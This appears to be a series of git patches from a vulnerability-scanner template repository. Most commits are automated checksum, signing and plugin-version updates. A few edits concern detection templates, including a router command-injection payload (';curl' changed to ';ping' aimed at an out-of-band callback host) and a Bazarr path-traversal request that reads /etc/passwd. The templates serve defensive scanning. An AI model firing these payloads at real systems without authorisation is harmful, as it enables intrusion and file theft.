http/technologies/workerman-websocket-detect.yaml:1396bc8234c4f538d5f57966b6b8084fe68f574f @@ -8902,7 +8902,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:3bfcbafbd85f583d02b2404875bd4b81b8d6def9 +templates-checksum.txt:98ab43414804bfd9896588fc2177c7319d9c3198 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From a5872e60759b83ab58f25c51bd2de10ca5b15abc Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Sun, 21 Jul 2024 08:31:28 +0000 Subject: [PATCH 1476/1841] Auto Generated New Template Addition List [Sun Jul 21 08:31:28 UTC 2024] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index 99d9c62685..4dc7a01b42 100644 --- a/.new-additions +++ b/.new-additions @@ -36,5 +36,6 @@ http/technologies/wordpress/plugins/wp-crontrol.yaml http/vulnerabilities/nextjs/nextjs-middleware-cache.yaml http/vulnerabilities/nextjs/nextjs-rsc-cache.yaml http/vulnerabilities/other/lvs-download-lfi.yaml +http/vulnerabilities/other/ncast-lfi.yaml network/cves/2024/CVE-2024-6746.yaml workflows/nacos-workflow.yaml From 4e86ef2192628b06843a89444deda7e2e0921d7c Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Sun, 21 Jul 2024 08:31:33 +0000 Subject: [PATCH 1477/1841] Auto Generated Templates Checksum [Sun Jul 21 08:31:33 UTC 2024] :robot: --- templates-checksum.txt | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index b4c5c47562..d021f1658d 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -8155,6 +8155,7 @@ http/vulnerabilities/other/myucms-lfr.yaml:8d0bfa8b8425fdb69817086012b8277d9955b http/vulnerabilities/other/nacos-auth-bypass.yaml:7cf2add98f8b55d98eb770f9ddfd3a908f50f76d http/vulnerabilities/other/natshell-path-traversal.yaml:17f09bec0c96347c08b70e2bd5a9df3be8f50cc9 http/vulnerabilities/other/natshell-rce.yaml:723bf60a0d083578377fa308221b4c1ceaf78b55 +http/vulnerabilities/other/ncast-lfi.yaml:f766ec7da1fe36dc61b566c15300a4da900750c2 http/vulnerabilities/other/netgear-router-auth-bypass.yaml:031b548982d19f7685bcc7d9b453e1ba236ac7e4 http/vulnerabilities/other/netgear-router-exposure.yaml:d401cd800f11fdd6c0cf6c556a4b61d7589d78f9 http/vulnerabilities/other/netgear-wac124-router-auth-bypass.yaml:a82ad04e613b9104f9be98fb4888d8965e9131d3 @@ -8902,7 +8903,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:98ab43414804bfd9896588fc2177c7319d9c3198 +templates-checksum.txt:5625b87a08fae03ba641435a214050ee52782699 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 984df884bf110c36bf5ce93d80a03fcad3c06099 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Sun, 21 Jul 2024 08:32:17 +0000 Subject: [PATCH 1478/1841] Syncing Templates --- .github/workflows/templates-sync.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index c5ac47642d..9971ae32ab 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -41,6 +41,7 @@ on: - 'http/vulnerabilities/nextjs/nextjs-middleware-cache.yaml' - 'http/vulnerabilities/nextjs/nextjs-rsc-cache.yaml' - 'http/vulnerabilities/other/lvs-download-lfi.yaml' + - 'http/vulnerabilities/other/ncast-lfi.yaml' - 'network/cves/2024/CVE-2024-6746.yaml' - 'workflows/nacos-workflow.yaml' workflow_dispatch: From 2fe9471d8bb351a310f098f7496718500ac6608d Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Sun, 21 Jul 2024 08:33:01 +0000 Subject: [PATCH 1479/1841] Auto Template Signing [Sun Jul 21 08:33:01 UTC 2024] :robot: --- http/exposures/files/ds-store-file.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/http/exposures/files/ds-store-file.yaml b/http/exposures/files/ds-store-file.yaml index 30f4c19230..b9314c8a54 100644 --- a/http/exposures/files/ds-store-file.yaml +++ b/http/exposures/files/ds-store-file.yaml @@ -39,3 +39,4 @@ http: - 'contains(to_lower(header), "accept-ranges: bytes")' - 'contains(to_lower(header), "octet-stream")' condition: or +# digest: 4b0a004830460221009fab4eb9b1d318314b8572f28732d7eacb4454e67e6fee390bbc8a32a0a155a1022100cb5b2748c2e2b89321d1179608471af748d567c9f28dd902c0416eac803dc002:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From f1ecc8a10092b5b0f7e453388bf82072bf16b5d6 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Sun, 21 Jul 2024 14:13:58 +0530 Subject: [PATCH 1480/1841] minor-updae --- http/vulnerabilities/other/wifisky7-rce.yaml | 13 ++++++++++--- 1 file changed, 10 insertions(+), 3 deletions(-) diff --git a/http/vulnerabilities/other/wifisky7-rce.yaml b/http/vulnerabilities/other/wifisky7-rce.yaml index 064023652a..41ad3b78f9 100644 --- a/http/vulnerabilities/other/wifisky7-rce.yaml +++ b/http/vulnerabilities/other/wifisky7-rce.yaml @@ -1,7 +1,7 @@ id: wifisky7-rce info: - name: WIFISKY-7 layer flow control router confirm.php - Remote Code Execution + name: WIFISKY-7 Layer Flow Control Router - Remote Code Execution author: pussycat0x severity: high description: | @@ -9,20 +9,27 @@ info: reference: - https://github.com/wy876/POC/blob/main/WIFISKY-7%E5%B1%82%E6%B5%81%E6%8E%A7%E8%B7%AF%E7%94%B1%E5%99%A8confirm.php%E6%8E%A5%E5%8F%A3%E5%A4%84%E5%AD%98%E5%9C%A8RCE%E6%BC%8F%E6%B4%9E.md metadata: + verified: true + max-request: 1 fofa-query: title="WIFISKY 7层流控路由器" tags: wifisky,rce http: - method: GET path: - - "{{BaseURL}}/notice/confirm.php?t=;curl+http%3A%2F%2F{{interactsh-url}}" + - "{{BaseURL}}/notice/confirm.php?t=%3bping+-c+3+{{interactsh-url}}" matchers-condition: and matchers: - type: word part: interactsh_protocol words: - - "http" + - "dns" + + - type: word + part: header + words: + - "L7Engine" - type: status status: From 443a45b386d6394ddf19adf4d0e0d5dea2f4bc0b Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Sun, 21 Jul 2024 08:47:14 +0000 Subject: [PATCH 1481/1841] Auto Generated New Template Addition List [Sun Jul 21 08:47:14 UTC 2024] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index 4dc7a01b42..050c5dd84d 100644 --- a/.new-additions +++ b/.new-additions @@ -37,5 +37,6 @@ http/vulnerabilities/nextjs/nextjs-middleware-cache.yaml http/vulnerabilities/nextjs/nextjs-rsc-cache.yaml http/vulnerabilities/other/lvs-download-lfi.yaml http/vulnerabilities/other/ncast-lfi.yaml +http/vulnerabilities/other/wifisky7-rce.yaml network/cves/2024/CVE-2024-6746.yaml workflows/nacos-workflow.yaml From 496f4fa0da93c0f5cb58dbd3b5d48404980b09f1 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Sun, 21 Jul 2024 08:47:18 +0000 Subject: [PATCH 1482/1841] Auto Generated Templates Checksum [Sun Jul 21 08:47:18 UTC 2024] :robot: --- templates-checksum.txt | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index d021f1658d..3d3973bb8a 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -5041,7 +5041,7 @@ http/exposures/files/desktop-ini-exposure.yaml:e1f2848de5e29a1d1f0069c15a5451d38 http/exposures/files/django-secret-key.yaml:9a9152c6627c7d1bb85923caedf61303f26e78b9 http/exposures/files/docker-cloud.yaml:1cd831e6d009b49e120b14206b7a19b825fd5272 http/exposures/files/domcfg-page.yaml:28b2f74eed60f6bf047db658ffcf8ccbacfb90a4 -http/exposures/files/ds-store-file.yaml:a1cc289907a19785a7325f0fd21c01a9bc6821a0 +http/exposures/files/ds-store-file.yaml:978c22f6db03261021eae813b741663c761e026f http/exposures/files/dwsync-exposure.yaml:811dc04f9ef973b6d48e8b007590508b61230b4b http/exposures/files/environment-rb.yaml:cfd936dc5174ec7eee345830477ad8ee013d5eb4 http/exposures/files/exposed-alps-spring.yaml:0bc7763901ec79b827388db7d80f1c2838d73f1e @@ -8292,6 +8292,7 @@ http/vulnerabilities/other/webigniter-xss.yaml:897ca9f80a8b4290fc37e0483d27b03d4 http/vulnerabilities/other/webpagetest-ssrf.yaml:c21a582fa932655dafc3188b76e0ba1a43f56d82 http/vulnerabilities/other/webui-rce.yaml:c43d198f5c4c62ac685df18ec9a49d44e314bcd8 http/vulnerabilities/other/wems-manager-xss.yaml:acff97542fbfebaf1ba088b7f560c6ca677c9e06 +http/vulnerabilities/other/wifisky7-rce.yaml:bd3dc2c027ff7217419c8a0c94a1e6ae49f8f440 http/vulnerabilities/other/wisegiga-nas-lfi.yaml:461884c7d59af3c309718544ea7f33c14b9fe14e http/vulnerabilities/other/wuzhicms-sqli.yaml:e949fbef0ad0e958652d50ca0d66b28834b88e50 http/vulnerabilities/other/xdcms-sqli.yaml:af7a3caae312f5e03b34de5efc46e054519786a7 @@ -8903,7 +8904,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:5625b87a08fae03ba641435a214050ee52782699 +templates-checksum.txt:5e5d65ee2c23b89bb2ea0149089d83b4a4f5ecd1 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 31125bb7686bbc3ac115e515d28b2aa6234ff44f Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Sun, 21 Jul 2024 08:48:06 +0000 Subject: [PATCH 1483/1841] Syncing Templates --- .github/workflows/templates-sync.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index 9971ae32ab..df372f3da2 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -42,6 +42,7 @@ on: - 'http/vulnerabilities/nextjs/nextjs-rsc-cache.yaml' - 'http/vulnerabilities/other/lvs-download-lfi.yaml' - 'http/vulnerabilities/other/ncast-lfi.yaml' + - 'http/vulnerabilities/other/wifisky7-rce.yaml' - 'network/cves/2024/CVE-2024-6746.yaml' - 'workflows/nacos-workflow.yaml' workflow_dispatch: From 1135662ffd9bd6c6c9e104f5276fa6a18bc9f46c Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Sun, 21 Jul 2024 08:49:01 +0000 Subject: [PATCH 1484/1841] Auto Template Signing [Sun Jul 21 08:49:01 UTC 2024] :robot: --- http/vulnerabilities/other/ncast-lfi.yaml | 1 + http/vulnerabilities/other/wifisky7-rce.yaml | 1 + 2 files changed, 2 insertions(+) diff --git a/http/vulnerabilities/other/ncast-lfi.yaml b/http/vulnerabilities/other/ncast-lfi.yaml index e63299e670..d55cd79e99 100644 --- a/http/vulnerabilities/other/ncast-lfi.yaml +++ b/http/vulnerabilities/other/ncast-lfi.yaml @@ -34,3 +34,4 @@ http: - type: status status: - 200 +# digest: 4a0a00473045022100c3ccb20d4d2894d7ad538e05b308dd310907922254ad4c9bda70fdb35a4209de02202ed3f40e27ef9ae92809083d6a8f7df2d7dc1c0cf4c9c7cb8cde61b8717159ff:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/vulnerabilities/other/wifisky7-rce.yaml b/http/vulnerabilities/other/wifisky7-rce.yaml index 41ad3b78f9..2564f6d6b2 100644 --- a/http/vulnerabilities/other/wifisky7-rce.yaml +++ b/http/vulnerabilities/other/wifisky7-rce.yaml @@ -34,3 +34,4 @@ http: - type: status status: - 200 +# digest: 490a00463044022073b20dd539c2f97f4d77df2710669ac8a48b867a4ebe397c7c80a3a667a3c1df02200b4c8bc61b0fb453d1fff643e6880e69c4b91f3223e5cd23d5d22f8bdb6fa3fa:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 3c9ba8908bcd433c5829f3b15a6da2c8a917da55 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Sun, 21 Jul 2024 14:21:48 +0530 Subject: [PATCH 1485/1841] minor-update --- http/vulnerabilities/other/bazarr-arbitrary-file-read.yaml | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/http/vulnerabilities/other/bazarr-arbitrary-file-read.yaml b/http/vulnerabilities/other/bazarr-arbitrary-file-read.yaml index 45b31d282d..c4953b556d 100644 --- a/http/vulnerabilities/other/bazarr-arbitrary-file-read.yaml +++ b/http/vulnerabilities/other/bazarr-arbitrary-file-read.yaml @@ -7,13 +7,14 @@ info: description: | Bazarr 1.4.3 and earlier versions have a arbitrary file read vulnerability. reference: - - https://github.com/4rdr/proofs/blob/d70b285245ac6e6efc71aa82c4aac8a4c615c29f/info/Bazaar_1.4.3_File_Traversal_via_Filename.md + - https://github.com/4rdr/proofs/blob/main/info/Bazaar_1.4.3_File_Traversal_via_Filename.md - https://www.bazarr.media/ metadata: vendor: morpheus65535 product: bazarr fofa-query: title=="Bazarr" && icon_hash="-1983413099" tags: bazarr,lfi + flow: http(1) && http(2) http: @@ -23,6 +24,7 @@ http: matchers: - type: word + part: body words: - 'Bazarr' internal: true @@ -32,7 +34,6 @@ http: GET /api/swaggerui/static/../../../../../../../../../../../../../../../../etc/passwd HTTP/1.1 Host: {{Hostname}} - matchers-condition: and matchers: - type: regex From b6dbec95e47014ebf8c2906539c7246dbce42a80 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Mon, 22 Jul 2024 00:21:16 +0000 Subject: [PATCH 1486/1841] Auto WordPress Plugins Update [Mon Jul 22 00:21:16 UTC 2024] :robot: --- helpers/wordpress/plugins/siteorigin-panels.txt | 2 +- http/technologies/wordpress/plugins/ad-inserter.yaml | 1 - http/technologies/wordpress/plugins/add-to-any.yaml | 1 - http/technologies/wordpress/plugins/admin-menu-editor.yaml | 1 - http/technologies/wordpress/plugins/advanced-custom-fields.yaml | 1 - http/technologies/wordpress/plugins/akismet.yaml | 1 - http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml | 1 - .../technologies/wordpress/plugins/all-in-one-wp-migration.yaml | 1 - .../wordpress/plugins/all-in-one-wp-security-and-firewall.yaml | 1 - http/technologies/wordpress/plugins/amp.yaml | 1 - http/technologies/wordpress/plugins/antispam-bee.yaml | 1 - http/technologies/wordpress/plugins/astra-sites.yaml | 1 - http/technologies/wordpress/plugins/autoptimize.yaml | 1 - http/technologies/wordpress/plugins/backwpup.yaml | 1 - http/technologies/wordpress/plugins/better-search-replace.yaml | 1 - http/technologies/wordpress/plugins/better-wp-security.yaml | 1 - .../wordpress/plugins/black-studio-tinymce-widget.yaml | 1 - http/technologies/wordpress/plugins/breadcrumb-navxt.yaml | 1 - http/technologies/wordpress/plugins/breeze.yaml | 1 - http/technologies/wordpress/plugins/broken-link-checker.yaml | 1 - http/technologies/wordpress/plugins/chaty.yaml | 1 - .../wordpress/plugins/child-theme-configurator.yaml | 1 - http/technologies/wordpress/plugins/classic-editor.yaml | 1 - http/technologies/wordpress/plugins/classic-widgets.yaml | 1 - .../wordpress/plugins/click-to-chat-for-whatsapp.yaml | 1 - http/technologies/wordpress/plugins/cmb2.yaml | 1 - http/technologies/wordpress/plugins/coblocks.yaml | 1 - http/technologies/wordpress/plugins/code-snippets.yaml | 1 - http/technologies/wordpress/plugins/coming-soon.yaml | 1 - http/technologies/wordpress/plugins/complianz-gdpr.yaml | 1 - .../technologies/wordpress/plugins/contact-form-7-honeypot.yaml | 1 - http/technologies/wordpress/plugins/contact-form-7.yaml | 1 - http/technologies/wordpress/plugins/contact-form-cfdb7.yaml | 1 - http/technologies/wordpress/plugins/cookie-law-info.yaml | 1 - http/technologies/wordpress/plugins/cookie-notice.yaml | 1 - http/technologies/wordpress/plugins/copy-delete-posts.yaml | 1 - http/technologies/wordpress/plugins/creame-whatsapp-me.yaml | 1 - .../wordpress/plugins/creative-mail-by-constant-contact.yaml | 1 - http/technologies/wordpress/plugins/custom-css-js.yaml | 1 - http/technologies/wordpress/plugins/custom-fonts.yaml | 1 - http/technologies/wordpress/plugins/custom-post-type-ui.yaml | 1 - http/technologies/wordpress/plugins/disable-comments.yaml | 1 - http/technologies/wordpress/plugins/disable-gutenberg.yaml | 1 - http/technologies/wordpress/plugins/duplicate-page.yaml | 1 - http/technologies/wordpress/plugins/duplicate-post.yaml | 1 - http/technologies/wordpress/plugins/duplicator.yaml | 1 - .../wordpress/plugins/duracelltomi-google-tag-manager.yaml | 1 - http/technologies/wordpress/plugins/easy-table-of-contents.yaml | 1 - http/technologies/wordpress/plugins/easy-wp-smtp.yaml | 1 - http/technologies/wordpress/plugins/elementor.yaml | 1 - http/technologies/wordpress/plugins/elementskit-lite.yaml | 1 - http/technologies/wordpress/plugins/enable-media-replace.yaml | 1 - http/technologies/wordpress/plugins/envato-elements.yaml | 1 - .../wordpress/plugins/essential-addons-for-elementor-lite.yaml | 1 - http/technologies/wordpress/plugins/ewww-image-optimizer.yaml | 1 - .../wordpress/plugins/facebook-for-woocommerce.yaml | 1 - http/technologies/wordpress/plugins/fast-indexing-api.yaml | 1 - .../wordpress/plugins/favicon-by-realfavicongenerator.yaml | 1 - http/technologies/wordpress/plugins/flamingo.yaml | 1 - http/technologies/wordpress/plugins/fluentform.yaml | 1 - http/technologies/wordpress/plugins/font-awesome.yaml | 1 - .../wordpress/plugins/force-regenerate-thumbnails.yaml | 1 - http/technologies/wordpress/plugins/formidable.yaml | 1 - http/technologies/wordpress/plugins/forminator.yaml | 1 - http/technologies/wordpress/plugins/ga-google-analytics.yaml | 1 - http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml | 1 - .../wordpress/plugins/google-analytics-dashboard-for-wp.yaml | 1 - .../wordpress/plugins/google-analytics-for-wordpress.yaml | 1 - .../technologies/wordpress/plugins/google-listings-and-ads.yaml | 1 - http/technologies/wordpress/plugins/google-site-kit.yaml | 1 - .../wordpress/plugins/google-sitemap-generator.yaml | 1 - http/technologies/wordpress/plugins/gtranslate.yaml | 1 - http/technologies/wordpress/plugins/gutenberg.yaml | 1 - http/technologies/wordpress/plugins/happy-elementor-addons.yaml | 1 - .../wordpress/plugins/header-footer-code-manager.yaml | 1 - .../technologies/wordpress/plugins/header-footer-elementor.yaml | 1 - http/technologies/wordpress/plugins/header-footer.yaml | 1 - http/technologies/wordpress/plugins/health-check.yaml | 1 - http/technologies/wordpress/plugins/hello-dolly.yaml | 1 - http/technologies/wordpress/plugins/host-webfonts-local.yaml | 1 - http/technologies/wordpress/plugins/hostinger.yaml | 1 - http/technologies/wordpress/plugins/image-optimization.yaml | 1 - http/technologies/wordpress/plugins/imagify.yaml | 1 - http/technologies/wordpress/plugins/imsanity.yaml | 1 - .../wordpress/plugins/insert-headers-and-footers.yaml | 1 - http/technologies/wordpress/plugins/instagram-feed.yaml | 1 - .../wordpress/plugins/intuitive-custom-post-order.yaml | 1 - http/technologies/wordpress/plugins/jetpack-boost.yaml | 1 - http/technologies/wordpress/plugins/jetpack.yaml | 1 - http/technologies/wordpress/plugins/kadence-blocks.yaml | 1 - http/technologies/wordpress/plugins/kirki.yaml | 1 - http/technologies/wordpress/plugins/leadin.yaml | 1 - .../wordpress/plugins/limit-login-attempts-reloaded.yaml | 1 - http/technologies/wordpress/plugins/limit-login-attempts.yaml | 1 - http/technologies/wordpress/plugins/litespeed-cache.yaml | 1 - http/technologies/wordpress/plugins/loco-translate.yaml | 1 - http/technologies/wordpress/plugins/loginizer.yaml | 1 - .../wordpress/plugins/mailchimp-for-woocommerce.yaml | 1 - http/technologies/wordpress/plugins/mailchimp-for-wp.yaml | 1 - http/technologies/wordpress/plugins/mailpoet.yaml | 1 - http/technologies/wordpress/plugins/maintenance.yaml | 1 - http/technologies/wordpress/plugins/mainwp-child.yaml | 1 - http/technologies/wordpress/plugins/malcare-security.yaml | 1 - http/technologies/wordpress/plugins/megamenu.yaml | 1 - http/technologies/wordpress/plugins/members.yaml | 1 - http/technologies/wordpress/plugins/meta-box.yaml | 1 - http/technologies/wordpress/plugins/metform.yaml | 1 - http/technologies/wordpress/plugins/ml-slider.yaml | 1 - http/technologies/wordpress/plugins/newsletter.yaml | 1 - .../wordpress/plugins/nextend-facebook-connect.yaml | 1 - http/technologies/wordpress/plugins/nextgen-gallery.yaml | 1 - http/technologies/wordpress/plugins/ninja-forms.yaml | 1 - http/technologies/wordpress/plugins/ocean-extra.yaml | 1 - .../technologies/wordpress/plugins/official-facebook-pixel.yaml | 1 - http/technologies/wordpress/plugins/one-click-demo-import.yaml | 1 - http/technologies/wordpress/plugins/optinmonster.yaml | 1 - http/technologies/wordpress/plugins/otter-blocks.yaml | 1 - http/technologies/wordpress/plugins/password-protected.yaml | 1 - http/technologies/wordpress/plugins/pdf-embedder.yaml | 1 - .../wordpress/plugins/pinterest-for-woocommerce.yaml | 1 - http/technologies/wordpress/plugins/pixelyoursite.yaml | 1 - http/technologies/wordpress/plugins/polylang.yaml | 1 - http/technologies/wordpress/plugins/popup-maker.yaml | 1 - http/technologies/wordpress/plugins/post-smtp.yaml | 1 - http/technologies/wordpress/plugins/post-types-order.yaml | 1 - .../wordpress/plugins/premium-addons-for-elementor.yaml | 1 - http/technologies/wordpress/plugins/pretty-link.yaml | 1 - http/technologies/wordpress/plugins/really-simple-captcha.yaml | 1 - http/technologies/wordpress/plugins/really-simple-ssl.yaml | 1 - http/technologies/wordpress/plugins/redirection.yaml | 1 - http/technologies/wordpress/plugins/redux-framework.yaml | 1 - http/technologies/wordpress/plugins/regenerate-thumbnails.yaml | 1 - http/technologies/wordpress/plugins/royal-elementor-addons.yaml | 1 - http/technologies/wordpress/plugins/safe-svg.yaml | 1 - http/technologies/wordpress/plugins/seo-by-rank-math.yaml | 1 - http/technologies/wordpress/plugins/sg-cachepress.yaml | 1 - http/technologies/wordpress/plugins/sg-security.yaml | 1 - http/technologies/wordpress/plugins/shortcodes-ultimate.yaml | 1 - .../wordpress/plugins/shortpixel-image-optimiser.yaml | 1 - .../wordpress/plugins/simple-custom-post-order.yaml | 1 - http/technologies/wordpress/plugins/simple-history.yaml | 1 - http/technologies/wordpress/plugins/siteguard.yaml | 1 - http/technologies/wordpress/plugins/siteorigin-panels.yaml | 1 - http/technologies/wordpress/plugins/smart-slider-3.yaml | 1 - http/technologies/wordpress/plugins/so-widgets-bundle.yaml | 1 - .../wordpress/plugins/sticky-header-effects-for-elementor.yaml | 1 - .../wordpress/plugins/stops-core-theme-and-plugin-updates.yaml | 1 - http/technologies/wordpress/plugins/sucuri-scanner.yaml | 1 - http/technologies/wordpress/plugins/table-of-contents-plus.yaml | 1 - http/technologies/wordpress/plugins/tablepress.yaml | 1 - http/technologies/wordpress/plugins/taxonomy-terms-order.yaml | 1 - http/technologies/wordpress/plugins/templately.yaml | 1 - http/technologies/wordpress/plugins/the-events-calendar.yaml | 1 - http/technologies/wordpress/plugins/tinymce-advanced.yaml | 1 - .../wordpress/plugins/translatepress-multilingual.yaml | 1 - .../wordpress/plugins/ultimate-addons-for-gutenberg.yaml | 1 - .../technologies/wordpress/plugins/under-construction-page.yaml | 1 - http/technologies/wordpress/plugins/updraftplus.yaml | 1 - http/technologies/wordpress/plugins/user-role-editor.yaml | 1 - http/technologies/wordpress/plugins/w3-total-cache.yaml | 1 - .../wordpress/plugins/webp-converter-for-media.yaml | 1 - http/technologies/wordpress/plugins/webp-express.yaml | 1 - .../wordpress/plugins/widget-importer-exporter.yaml | 1 - .../wordpress/plugins/woo-cart-abandonment-recovery.yaml | 1 - .../wordpress/plugins/woo-checkout-field-editor-pro.yaml | 1 - http/technologies/wordpress/plugins/woo-variation-swatches.yaml | 1 - .../wordpress/plugins/woocommerce-gateway-stripe.yaml | 1 - .../wordpress/plugins/woocommerce-legacy-rest-api.yaml | 1 - http/technologies/wordpress/plugins/woocommerce-payments.yaml | 1 - .../wordpress/plugins/woocommerce-paypal-payments.yaml | 1 - .../plugins/woocommerce-pdf-invoices-packing-slips.yaml | 1 - http/technologies/wordpress/plugins/woocommerce-services.yaml | 1 - http/technologies/wordpress/plugins/woocommerce.yaml | 1 - http/technologies/wordpress/plugins/wordfence.yaml | 1 - http/technologies/wordpress/plugins/wordpress-importer.yaml | 1 - http/technologies/wordpress/plugins/wordpress-seo.yaml | 1 - http/technologies/wordpress/plugins/worker.yaml | 1 - http/technologies/wordpress/plugins/wp-crontrol.yaml | 1 - http/technologies/wordpress/plugins/wp-fastest-cache.yaml | 1 - http/technologies/wordpress/plugins/wp-file-manager.yaml | 1 - http/technologies/wordpress/plugins/wp-google-maps.yaml | 1 - http/technologies/wordpress/plugins/wp-mail-smtp.yaml | 1 - http/technologies/wordpress/plugins/wp-maintenance-mode.yaml | 1 - http/technologies/wordpress/plugins/wp-migrate-db.yaml | 1 - http/technologies/wordpress/plugins/wp-multibyte-patch.yaml | 1 - http/technologies/wordpress/plugins/wp-optimize.yaml | 1 - http/technologies/wordpress/plugins/wp-pagenavi.yaml | 1 - http/technologies/wordpress/plugins/wp-reset.yaml | 1 - .../wordpress/plugins/wp-reviews-plugin-for-google.yaml | 1 - http/technologies/wordpress/plugins/wp-rollback.yaml | 1 - http/technologies/wordpress/plugins/wp-seopress.yaml | 1 - http/technologies/wordpress/plugins/wp-sitemap-page.yaml | 1 - http/technologies/wordpress/plugins/wp-smushit.yaml | 1 - http/technologies/wordpress/plugins/wp-statistics.yaml | 1 - http/technologies/wordpress/plugins/wp-super-cache.yaml | 1 - http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml | 1 - http/technologies/wordpress/plugins/wpcf7-redirect.yaml | 1 - http/technologies/wordpress/plugins/wpforms-lite.yaml | 1 - http/technologies/wordpress/plugins/wps-hide-login.yaml | 1 - http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml | 1 - .../wordpress/plugins/yith-woocommerce-wishlist.yaml | 1 - 201 files changed, 1 insertion(+), 201 deletions(-) diff --git a/helpers/wordpress/plugins/siteorigin-panels.txt b/helpers/wordpress/plugins/siteorigin-panels.txt index b765ebba38..34165b38df 100644 --- a/helpers/wordpress/plugins/siteorigin-panels.txt +++ b/helpers/wordpress/plugins/siteorigin-panels.txt @@ -1 +1 @@ -2.29.18 \ No newline at end of file +2.29.19 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ad-inserter.yaml b/http/technologies/wordpress/plugins/ad-inserter.yaml index 4e32af0cf3..3fd2256749 100644 --- a/http/technologies/wordpress/plugins/ad-inserter.yaml +++ b/http/technologies/wordpress/plugins/ad-inserter.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a004830460221008606283c5f4a6a516f250c1a61cca67b27c0a150f9c93abd2dbfa6cd71b20d8602210096d90a5e7ea0e7b14774a849c913b61c1740e4644406be6d5fc04570add9aa7d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/add-to-any.yaml b/http/technologies/wordpress/plugins/add-to-any.yaml index ff5520e823..6a0d344b63 100644 --- a/http/technologies/wordpress/plugins/add-to-any.yaml +++ b/http/technologies/wordpress/plugins/add-to-any.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100b70d45ef7750cb45fea18163cc1762389c9968ede88c9607ea4c9ceae055824b02207ddd7f17f05cdb987ceb27d683eb5a25796c2101fcb3cbec34d8a64a06bb8e3d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/admin-menu-editor.yaml b/http/technologies/wordpress/plugins/admin-menu-editor.yaml index 7be43793ed..6fb5080bc8 100644 --- a/http/technologies/wordpress/plugins/admin-menu-editor.yaml +++ b/http/technologies/wordpress/plugins/admin-menu-editor.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 